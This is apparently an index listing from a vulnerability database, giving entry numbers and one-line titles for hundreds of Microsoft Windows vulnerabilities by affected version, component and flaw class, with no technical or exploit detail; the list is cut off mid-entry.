Windows 10 20H2 up to Server 2019 TCP/IP Driver denial of service [172921] Microsoft Windows 7 SP1 up to Server 2019 DNS information disclosure [172920] Microsoft Windows 10 20H2/10 2004/Server 20H2/Server 2004 SMB information disclosure [172919] Microsoft Windows 8.1 up to Server 2019 SMB information disclosure [172917] Microsoft Windows 7 SP1 up to Server 2019 Remote Procedure Call Runtime unknown vulnerability [172916] Microsoft Windows 7 SP1 up to Server 2019 DNS information disclosure [172915] Microsoft Windows 7 SP1 up to Server 2019 Remote Procedure Call Runtime unknown vulnerability [172914] Microsoft Windows 7 SP1 up to Server 2019 Remote Procedure Call Runtime unknown vulnerability [172913] Microsoft Windows 7 SP1 up to Server 2019 Remote Procedure Call Runtime unknown vulnerability [172912] Microsoft Windows 7 SP1 up to Server 2019 on Remote Procedure Call Runtime unknown vulnerability [172911] Microsoft Windows 7 SP1 up to Server 2019 Remote Procedure Call Runtime unknown vulnerability [172910] Microsoft Windows 7 SP1 up to Server 2019 Remote Procedure Call Runtime unknown vulnerability [172909] Microsoft Windows 7 SP1 up to Server 2019 Remote Procedure Call Runtime unknown vulnerability [172908] Microsoft Windows 7 SP1 up to Server 2019 Remote Procedure Call Runtime unknown vulnerability [172907] Microsoft Windows 7 SP1 up to Server 2019 Remote Procedure Call Runtime unknown vulnerability [172906] Microsoft Windows 7 SP1 up to Server 2019 Remote Procedure Call Runtime unknown vulnerability [172905] Microsoft Windows 7 SP1 up to Server 2019 on Remote Procedure Call Runtime unknown vulnerability [172904] Microsoft Windows 7 SP1 up to Server 2019 Remote Procedure Call Runtime unknown vulnerability [172903] Microsoft Windows 7 SP1 up to Server 2019 Remote Procedure Call Runtime unknown vulnerability [172902] Microsoft Windows 7 SP1 up to Server 2019 Remote Procedure Call Runtime unknown vulnerability [172901] Microsoft Windows 7 SP1 up to Server 2019 Remote Procedure Call Runtime unknown vulnerability [172900] Microsoft Windows 7 SP1 up to Server 2019 Remote Procedure Call Runtime unknown vulnerability [172899] Microsoft Windows 8.1 up to Server 2019 Remote Procedure Call Runtime Remote unknown vulnerability [172898] Microsoft Windows 7 SP1 up to Server 2019 Remote Procedure Call Runtime unknown vulnerability [172896] Microsoft Windows 7 SP1 up to Server 2019 GDI+ unknown vulnerability [172895] Microsoft Windows 7 SP1 up to Server 2019 GDI+ unknown vulnerability [172894] Microsoft Windows 7 SP1 up to Server 2019 GDI+ unknown vulnerability [172892] Microsoft Windows 7 SP1 up to Server 2019 Remote Procedure Call Runtime unknown vulnerability [172891] Microsoft Windows 7 SP1 up to Server 2019 Remote Procedure Call Runtime unknown vulnerability [172890] Microsoft Windows 7 SP1 up to Server 2019 Remote Procedure Call Runtime unknown vulnerability [172889] Microsoft Windows 7 SP1 up to Server 2019 Remote Procedure Call Runtime unknown vulnerability [172888] Microsoft Windows 7 SP1 up to Server 2019 Remote Procedure Call Runtime unknown vulnerability [172887] Microsoft Windows 7 SP1 up to Server 2019 Remote Procedure Call Runtime unknown vulnerability [172886] Microsoft Windows 7 SP1 up to Server 2019 Remote Procedure Call Runtime unknown vulnerability [172885] Microsoft Windows 7 SP1 up to Server 2019 Remote Procedure Call Runtime unknown vulnerability [172880] Microsoft Windows 7 SP1 up to Server 2019 TCP/IP Driver denial of service [172877] Microsoft Windows 10 20H2 up to Server 2019 TCP/IP information disclosure [172875] Microsoft Windows 8.1 up to Server 2019 Hyper-V unknown vulnerability [172874] Microsoft Windows 7 SP1 up to Server 2019 Network File System unknown vulnerability [171012] Microsoft Windows 10 20H2 up to Server 2019 NAT denial of service [171009] Microsoft Windows 10 20H2 up to Server 2004 Hyper-V unknown vulnerability [171000] Microsoft Windows Server 20H2 up to Server 2019 DNS Server unknown vulnerability [170999] Microsoft Windows Server 20H2 up to Server 2019 DNS Server unknown vulnerability [170998] Microsoft Windows Server 20H2 up to Server 2019 DNS Server unknown vulnerability [170997] Microsoft Windows Server 20H2 up to Server 2019 DNS Server unknown vulnerability [170996] Microsoft Windows Server 20H2 up to Server 2019 DNS Server code injection [170995] Microsoft Windows Server 20H2 up to Server 2019 DNS Server denial of service [170994] Microsoft Windows Server 20H2 up to Server 2019 DNS Server denial of service [170990] Microsoft Windows Admin Center unknown vulnerability [170981] Microsoft Windows 7 SP1 up to Server 2019 Remote Access API privileges management [170979] Microsoft Windows 10 20H2 up to Server 2019 OpenType Font Parser code injection [170978] Microsoft Windows 7 SP1 up to Server 2019 Media Foundation unknown vulnerability [170907] Microsoft Windows 10 20H2 up to Server 2019 Application Virtualization code injection [170436] Microsoft Windows 8.1 up to Server 2019 Extended Protection for Authentication improper authentication [169530] Microsoft Windows 7 SP1 up to Server 2019 Trust Verification API denial of service [169529] Microsoft Windows 7 SP1 up to Server 2019 TCP/IP unknown vulnerability [169528] Microsoft Windows 7 SP1 up to Server 2019 TCP/IP unknown vulnerability [169527] Microsoft Windows 7 SP1 up to Server 2019 TCP/IP denial of service [169526] Microsoft Windows 7 SP1 up to Server 2019 Remote Procedure Call information disclosure [169525] Microsoft Windows 7 SP1 up to Server 2019 Local Spooler unknown vulnerability [169524] Microsoft Windows 10 20H2 up to Server 2019 Microsoft.PowerShell.Utility Module protection mechanism [169521] Microsoft Windows 10 20H2/10 2004/Server 20H2/Server 2004 Network File System denial of service [169509] Microsoft Windows 7 SP1 up to Server 2019 Address Book unknown vulnerability [169502] Microsoft Windows 7 SP1 up to Server 2019 Fax Service unknown vulnerability [169501] Microsoft Windows 7 SP1 up to Server 2019 Fax Service unknown vulnerability [169499] Microsoft Windows Server 20H2 up to Server 2019 DNS Server unknown vulnerability [169498] Microsoft Windows 10 up to Server 2019 unknown vulnerability [169497] Microsoft Windows 10 Version 1809 for 32-bit Systems Codecs Library unknown vulnerability [169487] Microsoft Windows 10 up to Server 2019 Graphics unknown vulnerability [167703] Microsoft Windows 7 SP1 up to Server 2019 Update Stack privileges management [167700] Microsoft Windows 10 up to Server 2019 RDP authorization [167699] Microsoft Windows 7 SP1 up to Server 2019 RDP Core unknown vulnerability [167687] Microsoft Windows 7 SP1 up to Server 2019 Graphics information disclosure [167686] Microsoft Windows 7 SP1 up to Server 2019 GDI+ information disclosure [167685] Microsoft Windows 7 SP1 up to Server 2019 Fax Compose Form privileges management [167680] Microsoft Windows 7 SP1 up to Server 2019 CryptoAPI denial of service [167655] Microsoft Windows 8.1 up to Server 2019 NTLM unknown vulnerability [167651] Microsoft Windows 7 SP1 up to Server 2019 Media Foundation unknown vulnerability [167638] Microsoft Windows 7 SP1 up to Server 2019 DTV-DVD Video Decoder unknown vulnerability [167637] Microsoft Windows 8.1/10/10 1607/Server 2012 R2/Server 2016 Hyper-V denial of service [167636] Microsoft Windows 10 20H2 up to Server 2004 Hyper-V denial of service [167633] Microsoft Windows 7 SP1 up to Server 2019 GDI+ unknown vulnerability [160963] Microsoft Windows up to Server 2019 Projected Filesystem privilege escalation [160951] Microsoft Windows up to Server 2019 Kernel memory corruption [160950] Microsoft OneDrive on Windows privilege escalation [160949] Microsoft OneDrive on Windows privilege escalation [160948] Microsoft OneDrive on Windows privilege escalation [160947] Microsoft Windows up to Server 2019 UPnP Service privilege escalation [160946] Microsoft Windows up to Server 2019 TLS weak encryption [160944] Microsoft Windows up to Server 2019 Kernel Improper Initialization [160943] Microsoft Windows up to Server 2019 Connected User Experiences/Telemetry Service privilege escalation [160942] Microsoft Windows up to Server 2019 Kernel information disclosure [160940] Microsoft Windows up to Server 2019 Storage Services privilege escalation [160939] Microsoft Windows up to Server 2004 InstallService privilege escalation [160936] Microsoft Windows up to Server 2019 Microsoft COM for Windows privilege escalation [160932] Microsoft Windows up to Server 2019 CloudExperienceHost privilege escalation [160930] Microsoft Windows up to Server 2019 fdSSDP.dll privilege escalation [160925] Microsoft Windows up to Server 2019 DirectX privilege escalation [160924] Microsoft Windows up to Server 2019 Windows Runtime privilege escalation [160923] Microsoft Windows up to Server 2019 GDI information disclosure [160922] Microsoft Windows up to Server 2019 Win32k information disclosure [160921] Microsoft Windows up to Server 2019 Win32k privilege escalation [160920] Microsoft Windows up to Server 2019 DNS denial of service [160912] Microsoft Windows up to Server 2019 Windows Runtime privilege escalation [160911] Microsoft Windows up to Server 2004 StartTileData.dll privilege escalation [160910] Microsoft Windows up to Server 2019 Win32k.sys privilege escalation [160909] Microsoft Windows up to Server 2019 Store Runtime privilege escalation [160908] Microsoft Windows up to Server 2019 Diagnostics Hub Standard Collector privilege escalation [160907] Microsoft Windows up to Server 2019 Diagnostics Hub Standard Collector privilege escalation [160906] Microsoft Windows up to Server 2019 Language Pack Installer privilege escalation [160905] Microsoft Windows up to Server 2004 StartTileData.dll information disclosure [160904] Microsoft Windows up to Server 2019 Common Log File System Driver privilege escalation [160903] Microsoft Windows 10 2004 Shell Infrastructure privilege escalation [160902] Microsoft Windows up to Server 2019 GDI Dynamically-Managed Code Resources [160901] Microsoft Windows up to Server 2019 Graphics Component Dynamically-Managed Code Resources [160900] Microsoft Windows up to Server 2019 Graphics Component memory corruption [160899] Microsoft Windows up to Server 2019 JET Database Engine memory corruption [160898] Microsoft Windows up to Server 2019 DirectX privilege escalation [160895] Microsoft Windows up to Server 2019 JET Database Engine memory corruption [160894] Microsoft Windows up to Server 2019 Routing Utilities denial of service [160892] Microsoft Windows up to Server 2019 Kernel information disclosure [160891] Microsoft Windows up to Server 2019 DHCP Server information disclosure [160890] Microsoft Windows up to Server 2019 Print Spooler privilege escalation [160889] Microsoft Windows up to Server 2019 Group Policy privilege escalation [160886] Microsoft Windows up to Server 2019 Mobile Device Management privilege escalation [160883] Microsoft Windows up to Server 2019 Kernel information disclosure [160882] Microsoft Windows up to Server 2019 Graphics Component information disclosure [160881] Microsoft Windows up to Server 2019 State Repository Service information disclosure [160880] Microsoft Windows up to Server 2019 Function Discovery SSDP Provider privilege escalation [160879] Microsoft Windows up to Server 2019 Modules Installer privilege escalation [160876] Microsoft Windows up to Server 2019 Storage Services privilege escalation [160874] Microsoft Windows up to Server 2019 Shell Infrastructure memory corruption [160873] Microsoft Windows up to Server 2019 Active Directory integrated DNS information disclosure [160871] Microsoft Windows up to Server 2019 NTFS privilege escalation [160870] Microsoft Windows up to Server 2019 Active Directory Federation Service 2FA weak authentication [160869] Microsoft Windows up to Server 2019 DNS privilege escalation [160868] Microsoft Windows 10 2004/Server 2004 Projected Filesystem privilege escalation [160866] Microsoft Windows up to Server 2019 Cryptographic Catalog Service privilege escalation [160865] Microsoft Windows up to Server 2019 Store Runtime privilege escalation [160864] Microsoft Windows up to Server 2019 Active Directory integrated DNS privilege escalation [160863] Microsoft Windows up to Server 2019 Active Directory integrated DNS memory corruption [160862] Microsoft Windows up to Server 2019 Active Directory integrated DNS information disclosure [160861] Microsoft Windows up to Server 2019 RSoP Service Application privilege escalation [160855] Microsoft Windows up to Server 2019 Media Audio Decoder memory corruption [160853] Microsoft Windows up to Server 2019 Media Audio Decoder privilege escalation [160849] Microsoft Windows up to Server 2019 Codecs Library memory corruption [160848] Microsoft Windows up to Server 2019 GDI+ memory corruption [160847] Microsoft Windows up to Server 2019 memory corruption [160843] Microsoft Windows up to Server 2019 Codecs Library memory corruption [160841] Microsoft Windows up to Server 2019 Camera Codec Pack memory corruption [160840] Microsoft Windows up to Server 2019 Microsoft COM for Windows memory corruption [160839] Microsoft Windows up to Server 2019 Text Service Module memory corruption [159610] Microsoft Windows up to Server 2019 Speech Runtime privilege escalation [159608] Microsoft Windows up to Server 2019 File Server Resource Management Service privilege escalation [159604] Microsoft Windows up to Server 2019 Storage Service privilege escalation [159601] Microsoft Windows up to Server 2019 Speech Shell privilege escalation [159600] Microsoft Windows up to Server 2019 UPnP Device Host privilege escalation [159597] Microsoft Windows up to Server 2019 File Server Resource Management Service privilege escalation [159595] Microsoft Windows up to Server 2019 JET Database Engine memory corruption [159594] Microsoft Windows up to Server 2019 Windows Runtime memory corruption [159593] Microsoft Windows up to Server 2019 Work Folders Service privilege escalation [159592] Microsoft Windows up to Server 2019 CSC Service privilege escalation [159591] Microsoft Windows up to Server 2019 Work Folder Service memory corruption [159590] Microsoft Windows up to RT 8.1 Backup Engine privilege escalation [159589] Microsoft Windows up to Server 2019 State Repository Service information disclosure [159588] Microsoft Windows up to Server 2019 CDP User memory corruption [159587] Microsoft Windows up to Server 2019 Work Folders Service privilege escalation [159585] Microsoft Windows up to Server 2019 Connected User Experiences/Telemetry Service privilege escalation [159584] Microsoft Windows up to Server 2019 WaasMedic Service information disclosure [159583] Microsoft Windows up to RT 8.1 Backup Engine privilege escalation [159582] Microsoft Windows up to Server 2019 Local Security Authority Subsystem Service privilege escalation [159581] Microsoft Windows up to RT 8.1 Backup Engine privilege escalation [159580] Microsoft Windows Remote Desktop Gateway privilege escalation [159579] Microsoft Windows up to RT 8.1 Backup Engine privilege escalation [159574] Microsoft Windows up to RT 8.1 Backup Engine privilege escalation [159573] Microsoft Windows up to RT 8.1 Backup Engine privilege escalation [159572] Microsoft Windows up to RT 8.1 Backup Engine privilege escalation [159571] Microsoft Windows up to Server 2019 UPnP Device Host memory corruption [159570] Microsoft Windows up to RT 8.1 Backup Engine privilege escalation [159568] Microsoft Windows up to Server 2019 CSC Service privilege escalation [159567] Microsoft Windows up to Server 2019 GDI memory corruption [159566] Microsoft Windows up to Server 2019 Remote Access memory corruption [159564] Microsoft Windows up to Server 2019 AppX Deployment Extension privilege escalation [159563] Microsoft Windows up to Server 2019 Custom Protocol Engine memory corruption [159562] Microsoft Windows up to RT 8.1 Backup Engine privilege escalation [159561] Microsoft Windows up to Server 2019 Kernel information disclosure [159560] Microsoft Windows up to RT 8.1 Backup Engine privilege escalation [159558] Microsoft Windows up to Server 2019 Kernel privilege escalation [159557] Microsoft Windows up to Server 2019 Font Driver Host memory corruption [159556] Microsoft Windows up to Server 2019 Speech Runtime privilege escalation [159555] Microsoft Windows up to Server 2019 Backup Service privilege escalation [159554] Microsoft Windows up to RT 8.1 Backup Engine privilege escalation [159553] Microsoft Windows up to Server 2019 Telephony Server privilege escalation [159552] Microsoft Windows up to Server 2019 CDP User memory corruption [159550] Microsoft Windows up to Server 2019 JET Database Engine memory corruption [159548] Microsoft Windows up to Server 2019 Backup Engine privilege escalation [159545] Microsoft Windows up to Server 2019 GDI privilege escalation [159543] Microsoft Windows up to Server 2019 Kernel memory corruption [159542] Microsoft Windows up to Server 2019 Hard Link privilege escalation [159541] Microsoft Windows up to Server 2019 Remote Access memory corruption [159540] Microsoft Windows up to Server 2019 JET Database Engine memory corruption [159539] Microsoft Windows up to Server 2019 Radio Manager API memory corruption [159537] Microsoft Windows up to Server 2019 Accounts Control memory corruption [159534] Microsoft Windows up to Server 2019 Graphics Component memory corruption [159531] Microsoft Windows up to Server 2019 Graphics Component memory corruption [159530] Microsoft Windows up to Server 2019 Media Foundation information disclosure [159529] Microsoft Windows up to Server 2019 Network Connection Broker privilege escalation [159528] Microsoft Windows up to Server 2019 Ancillary Function Driver for WinSock privilege escalation [159526] Microsoft Windows up to Server 2019 Public Account Pictures Folder privilege escalation [159524] Microsoft Windows up to Server 2019 Win32k information disclosure [159523] Microsoft Windows up to Server 2019 Media Foundation memory corruption [159522] Microsoft Windows up to Server 2019 DirectWrite information disclosure [159521] Microsoft Windows up to Server 2019 SSDP Provider privilege escalation [159518] Microsoft Windows up to Server 2019 JET Database Engine memory corruption [159517] Microsoft Windows up to Server 2019 Work Folders Service privilege escalation [159513] Microsoft Windows up to Server 2019 DirectX privilege escalation [159512] Microsoft Windows up to Server 2019 Kernel privilege escalation [159509] Microsoft Windows 10 1909/10 2004 Codecs Library memory corruption [159504] Microsoft Windows up to Server 2019 Media Foundation memory corruption [159503] Microsoft Windows up to Server 2019 Media Foundation memory corruption [159500] Microsoft Windows up to Server 2004 Codecs Library memory corruption [159499] Microsoft Windows up to Server 2019 Media Foundation memory corruption [159497] Microsoft Windows up to Server 2019 Media Audio Codec memory corruption [159496] Microsoft Windows up to 10 2004 Codecs Library memory corruption [159495] Microsoft Windows up to Server 2019 Media Foundation memory corruption [159494] Microsoft Windows up to Server 2019 Media Foundation memory corruption [159433] Microsoft Windows net use weak authentication [159426] Microsoft Windows VCF Card privilege escalation [159425] Microsoft Windows Group File privilege escalation [158019] Microsoft Windows up to Server 2019 Windows Runtime privilege escalation [157995] Microsoft Windows up to Server 2019 WalletService information disclosure [157993] Microsoft Windows up to Server 2019 WalletService privilege escalation [157991] Microsoft Windows up to Server 2019 Update Stack privilege escalation [157990] Microsoft Windows up to Server 2019 Modules Installer privilege escalation [157989] Microsoft Windows up to Server 2019 Delivery Optimization Service privilege escalation [157988] Microsoft Windows 10 2004/Server 2004 Subsystem for Linux privilege escalation [157986] Microsoft Windows up to Server 2019 Windows Runtime privilege escalation [157985] Microsoft Windows up to Server 2019 Profile Service privilege escalation [157984] Microsoft Windows up to Server 2019 Windows Runtime privilege escalation [157983] Microsoft Windows up to Server 2019 Kernel privilege escalation [157981] Microsoft Windows up to Server 2019 Kernel information disclosure [157979] Microsoft Windows up to Server 2019 Resource Policy information disclosure [157978] Microsoft Windows up to Server 2019 Kernel information disclosure [157977] Microsoft Windows up to Server 2019 Kernel memory corruption [157975] Microsoft Windows up to Server 2019 ALPC privilege escalation [157973] Microsoft Windows 2012/2012 R2/2016/Server 2008 R2 SP1 Hyper-V RemoteFX vGPU privilege escalation [157972] Microsoft Windows 2012/2012 R2/2016/Server 2008 R2 SP1 Hyper-V RemoteFX vGPU privilege escalation [157971] Microsoft Windows 2012/2012 R2/2016/Server 2008 R2 SP1 Hyper-V RemoteFX vGPU privilege escalation [157970] Microsoft Windows 2012/2012 R2/2016/Server 2008 R2 SP1 Hyper-V RemoteFX vGPU privilege escalation [157969] Microsoft Windows 2012/2012 R2/2016/Server 2008 R2 SP1 Hyper-V RemoteFX vGPU privilege escalation [157968] Microsoft Windows 2012/2012 R2/2016/Server 2008 R2 SP1 Hyper-V RemoteFX vGPU privilege escalation [157963] Microsoft Windows up to Server 2019 CNG Key Isolation Service privilege escalation [157960] Microsoft Windows up to Server 2019 Diagnostics Hub privilege escalation [157957] Microsoft Windows up to Server 2019 Push Notification Service privilege escalation [157956] Microsoft Windows up to Server 2019 Connected User Experiences/Telemetry Service information disclosure [157955] Microsoft Windows up to Server 2019 Agent Activation Runtime information disclosure [157952] Microsoft Windows up to Server 2019 USO Core Worker privilege escalation [157951] Microsoft Windows up to Server 2019 Storage Services privilege escalation [157950] Microsoft Windows up to Server 2019 UPnP Device Host privilege escalation [157949] Microsoft Windows up to Server 2019 Windows Runtime privilege escalation [157948] Microsoft Windows up to Server 2019 Windows Runtime privilege escalation [157946] Microsoft Windows up to Server 2019 lnk File privilege escalation [157945] Microsoft Windows up to Server 2019 Error Reporting information disclosure [157944] Microsoft Windows iSCSI Target Service privilege escalation [157943] Microsoft Windows up to Server 2019 Mobile Device Management privilege escalation [157942] Microsoft Windows up to Server 2019 Event Logging privilege escalation [157941] Microsoft Windows up to Server 2019 Remote Desktop Client memory corruption [157939] Microsoft Windows up to Server 2019 Picker Platform privilege escalation [157938] Microsoft Windows up to Server 2019 CNG Key Isolation Service privilege escalation [157937] Microsoft Windows up to Server 2019 Windows Print Workflow Service privilege escalation [157936] Microsoft Windows up to Server 2019 Event Logging privilege escalation [157935] Microsoft Windows up to Server 2019 Windows Runtime privilege escalation [157934] Microsoft Windows up to Server 2019 Local Security Authority Subsystem Service privilege escalation [157933] Microsoft Windows up to Server 2019 Windows Runtime privilege escalation [157930] Microsoft Windows up to Server 2019 Windows Runtime privilege escalation [157925] Microsoft Windows up to Server 2019 Error Reporting Manager privilege escalation [157924] Microsoft Windows up to Server 2019 UPnP Device Host privilege escalation [157923] Microsoft Windows up to Server 2019 Network Connections Service privilege escalation [157922] Microsoft Windows up to Server 2019 Windows Runtime privilege escalation [157921] Microsoft Windows up to Server 2019 Mobile Device Management privilege escalation [157920] Microsoft Windows up to Server 2019 AppX Deployment Extension privilege escalation [157919] Microsoft Windows up to Server 2019 Mobile Device Management information disclosure [157918] Microsoft Windows up to Server 2019 ActiveX Installer Service privilege escalation [157916] Microsoft Windows up to Server 2019 Windows Address Book privilege escalation [157913] Microsoft OneDrive on Windows privilege escalation [157895] Microsoft Windows Defender MpSigStub.exe privilege escalation [157894] Microsoft Windows up to Server 2019 JET Database Engine memory corruption [157893] Microsoft Windows up to Server 2019 JET Database Engine memory corruption [157892] Microsoft Windows up to Server 2019 JET Database Engine memory corruption [157889] Microsoft Windows up to Server 2019 Imaging information disclosure [157888] Microsoft Windows up to Server 2019 Graphics Origin Validation Error [157887] Microsoft Windows up to Server 2019 DirectWrite memory corruption [157886] Microsoft Windows up to Server 2019 Graphics Component memory corruption [157885] Microsoft Windows up to Server 2019 GDI+ memory corruption [157884] Microsoft Windows up to Server 2019 Font Library privilege escalation [157883] Microsoft Windows up to Server 2019 Graphics Component information disclosure [157882] Microsoft Windows up to Server 2019 GDI information disclosure [157881] Microsoft Windows up to Server 2004 Font Driver Host memory corruption [157509] Microsoft Windows up to Server 2019 Codecs Library memory corruption [157508] Microsoft Windows up to Server 2019 Codecs Library memory corruption [156422] Microsoft Windows 10 2004/Server 2004 SMBv3 denial of service [156421] Microsoft Windows up to Server 2004 SMBv3 information disclosure [156420] Microsoft Windows up to Server 2019 Windows Shell privilege escalation [156419] Microsoft Windows up to Server 2019 LNK privilege escalation [156418] Microsoft Windows up to Server 2019 CAB File privilege escalation [156417] Microsoft Windows up to Server 2019 OLE Automation privilege escalation [156415] Microsoft Windows up to Server 2019 Media Foundation information disclosure [156414] Microsoft Windows up to Server 2019 Media Foundation memory corruption [156413] Microsoft Windows up to Server 2019 Windows Runtime privilege escalation [156412] Microsoft Windows up to Server 2019 Media Foundation memory corruption [156410] Microsoft Windows up to Server 2004 Windows Runtime privilege escalation [156409] Microsoft Windows up to Server 2019 Kernel privilege escalation [156408] Microsoft Windows up to Server 2019 Windows Runtime privilege escalation [156407] Microsoft Windows up to Server 2019 Kernel privilege escalation [156406] Microsoft Windows up to Server 2019 Kernel privilege escalation [156404] Microsoft Windows up to Server 2019 Kernel privilege escalation [156403] Microsoft Windows up to Server 2019 Kernel privilege escalation [156402] Microsoft Windows up to Server 2019 Win32k privilege escalation [156401] Microsoft Windows up to Server 2004 Kernel privilege escalation [156399] Microsoft Windows up to Server 2004 Kernel privilege escalation [156398] Microsoft Windows up to Server 2019 Win32k privilege escalation [156397] Microsoft Windows up to Server 2019 Kernel privilege escalation [156396] Microsoft Windows Windows Installer privilege escalation [156395] Microsoft Windows up to Server 2019 Windows Installer privilege escalation [156394] Microsoft Windows up to Server 2019 Windows Installer privilege escalation [156393] Microsoft Windows up to Server 2019 Error Reporting information disclosure [156386] Microsoft Windows up to Server 2004 GDI+ memory corruption [156385] Microsoft Windows up to Server 2019 Windows Runtime information disclosure [156384] Microsoft Windows up to Server 2019 Windows Runtime privilege escalation [156382] Microsoft Windows up to Server 2019 Connected Devices Platform Service privilege escalation [156381] Microsoft Windows up to Server 2004 Kernel privilege escalation [156380] Microsoft Windows up to Server 2019 Mobile Device Management privilege escalation [156378] Microsoft Windows up to Server 2019 Windows Runtime privilege escalation [156377] Microsoft Windows up to Server 2019 Registry privilege escalation [156376] Microsoft Windows up to Server 2019 Error Reporting Manager privilege escalation [156375] Microsoft Windows up to Server 2019 Error Reporting privilege escalation [156374] Microsoft Windows up to Server 2019 Windows Runtime privilege escalation [156373] Microsoft Windows up to Server 2019 Kernel privilege escalation [156372] Microsoft Windows up to Server 2019 Windows Runtime privilege escalation [156371] Microsoft Windows up to Server 2019 Session Manager privilege escalation [156370] Microsoft Windows 10 2004/Server 2004 Connected User Experiences/Telemetry Service privilege escalation [156369] Microsoft Windows up to Server 2019 Store Runtime privilege escalation [156368] Microsoft Windows up to Server 2019 Backup Service privilege escalation [156367] Microsoft Windows up to Server 2019 Text Service Framework privilege escalation [156365] Microsoft Windows up to Server 2019 Connected User Experiences/Telemetry Service denial of service [156364] Microsoft Windows up to Server 2019 Group Policy privilege escalation [156363] Microsoft Windows up to Server 2019 OpenSSH privilege escalation [156361] Microsoft Windows up to Server 2019 Win32k information disclosure [156360] Microsoft Windows up to Server 2004 Windows Service information disclosure [156359] Microsoft Windows up to Server 2019 Host Guardian Service information disclosure [156358] Microsoft Windows up to Server 2019 Error Reporting information disclosure [156356] Microsoft Windows up to Server 2019 Background Intelligent Transfer Service privilege escalation [156354] Microsoft Windows up to Server 2019 Diagnostics/Feedback Settings App information disclosure [156353] Microsoft Windows up to Server 2019 Windows Runtime privilege escalation [156352] Microsoft Windows up to Server 2019 Windows Installer privilege escalation [156351] Microsoft Windows up to Server 2019 Store Runtime privilege escalation [156350] Microsoft Windows up to Server 2019 Kernel privilege escalation [156349] Microsoft Windows up to Server 2004 Update Orchestrator Service privilege escalation [156348] Microsoft Windows up to Server 2019 State Repository Service privilege escalation [156347] Microsoft Windows up to Server 2019 Security Health Service privilege escalation [156346] Microsoft Windows up to Server 2019 Security Health Service privilege escalation [156321] Microsoft Windows Defender privilege escalation [156320] Microsoft Windows Defender privilege escalation [156319] Microsoft Windows up to Server 2019 JET Database Engine memory corruption [156318] Microsoft Windows up to Server 2019 JET Database Engine memory corruption [156317] Microsoft Windows up to Server 2019 GDI privilege escalation [156316] Microsoft Windows up to Server 2019 Kernel privilege escalation [156315] Microsoft Windows up to Server 2019 GDI information disclosure [156314] Microsoft Windows up to Server 2019 Win32k privilege escalation [156313] Microsoft Windows up to Server 2019 GDI privilege escalation [156312] Microsoft Windows up to Server 2019 Graphics Component information disclosure [156311] Microsoft Windows up to Server 2019 Win32k privilege escalation [156310] Microsoft Windows up to Server 2019 DirectX privilege escalation [156309] Microsoft Windows up to Server 2019 Win32k privilege escalation [156303] Microsoft Windows 10 1709/10 1803/10 1809/10 1903/Server 2004 Feedback Hub privilege escalation [156302] Microsoft Windows up to Server 2019 Diagnostic Hub privilege escalation [156301] Microsoft Windows up to Server 2019 Diagnostic Hub privilege escalation [156300] Microsoft Windows up to Server 2019 Diagnostics Hub Standard Collector privilege escalation [155176] Microsoft Windows up to Server 2019 State Repository Service privilege escalation [155175] Microsoft Windows up to Server 2019 State Repository Service privilege escalation [155174] Microsoft Windows up to Server 2019 State Repository Service privilege escalation [155173] Microsoft Windows up to Server 2019 State Repository Service privilege escalation [155172] Microsoft Windows up to Server 2019 State Repository Service privilege escalation [155171] Microsoft Windows up to Server 2019 State Repository Service privilege escalation [155170] Microsoft Windows up to Server 2019 State Repository Service privilege escalation [155169] Microsoft Windows up to Server 2019 State Repository Service privilege escalation [155168] Microsoft Windows up to Server 2019 GDI information disclosure [155167] Microsoft Windows up to Server 2019 JET Database Engine memory corruption [155166] Microsoft Windows up to Server 2019 JET Database Engine memory corruption [155165] Microsoft Windows up to Server 2019 JET Database Engine memory corruption [155162] Microsoft Windows Clipboard Service privilege escalation [155161] Microsoft Windows Clipboard Service privilege escalation [155160] Microsoft Windows up to Server 2019 Windows Runtime privilege escalation [155158] Microsoft Windows up to Server 2019 Windows Runtime privilege escalation [155157] Microsoft Windows up to Server 2019 Windows Runtime privilege escalation [155156] Microsoft Windows up to Server 2019 Windows Runtime privilege escalation [155155] Microsoft Windows up to Server 2019 Windows Runtime privilege escalation [155154] Microsoft Windows up to Server 2019 Common Log File System Driver privilege escalation [155153] Microsoft Windows up to Server 2019 Windows Runtime privilege escalation [155152] Microsoft Windows 7 SP1/Server 2008 R2 SP1 Media Foundation memory corruption [155151] Microsoft Windows up to Server 2019 Windows Runtime privilege escalation [155150] Microsoft Windows GDI information disclosure [155149] Microsoft Windows up to Server 2019 State Repository Service privilege escalation [155148] Microsoft Windows up to Server 2019 Win32k privilege escalation [155147] Microsoft Windows up to Server 2019 GDI privilege escalation [155146] Microsoft Windows up to Server 2019 GDI information disclosure [155145] Microsoft Windows up to Server 2019 DirectX privilege escalation [155144] Microsoft Windows up to Server 2019 Windows Runtime privilege escalation [155143] Microsoft Windows up to Server 2019 Storage Service privilege escalation [155142] Microsoft Windows up to Server 2019 Push Notification Service privilege escalation [155141] Microsoft Windows up to Server 2019 Graphics Component privilege escalation [155140] Microsoft Windows up to Server 2019 State Repository Service privilege escalation [155139] Microsoft Windows up to Server 2019 Error Reporting Manager privilege escalation [155138] Microsoft Windows up to Server 2019 State Repository Service privilege escalation [155137] Microsoft Windows up to Server 2019 Windows Runtime privilege escalation [155136] Microsoft Windows up to Server 2019 State Repository Service privilege escalation [155135] Microsoft Windows up to Server 2019 Connected User Experiences/Telemetry Service privilege escalation [155134] Microsoft Windows up to Server 2019 Clipboard Service privilege escalation [155133] Microsoft Windows up to Server 2019 TLS denial of service [155132] Microsoft Windows up to Server 2019 CSRSS information disclosure [155131] Microsoft Windows up to Server 2019 Kernel privilege escalation [155130] Microsoft Windows up to Server 2019 Task Scheduler weak authentication [155129] Microsoft Windows up to Server 2019 Background Intelligent Transfer Service privilege escalation [155127] Microsoft Windows up to Server 2019 Update Stack privilege escalation [155126] Microsoft Windows up to Server 2019 Update Stack privilege escalation [155115] Microsoft Windows up to Server 2019 Windows Runtime privilege escalation [155114] Microsoft Windows up to Server 2019 Error Reporting privilege escalation [155112] Microsoft Windows up to Server 2019 Windows Runtime privilege escalation [155111] Microsoft Windows up to Server 2019 Connected User Experiences/Telemetry Service privilege escalation [155110] Microsoft Windows up to Server 2019 Error Reporting privilege escalation [155109] Microsoft Windows up to Server 2019 Printer Service privilege escalation [155108] Microsoft Windows up to Server 2019 privilege escalation [155107] Microsoft Windows up to Server 2019 Windows Installer privilege escalation [155106] Microsoft Windows up to Server 2019 Windows Runtime privilege escalation [155105] Microsoft Windows up to Server 2019 memory corruption [155104] Microsoft Windows up to Server 2019 Subsystem for Linux information disclosure [155103] Microsoft Windows up to Server 2019 information disclosure [155100] Microsoft 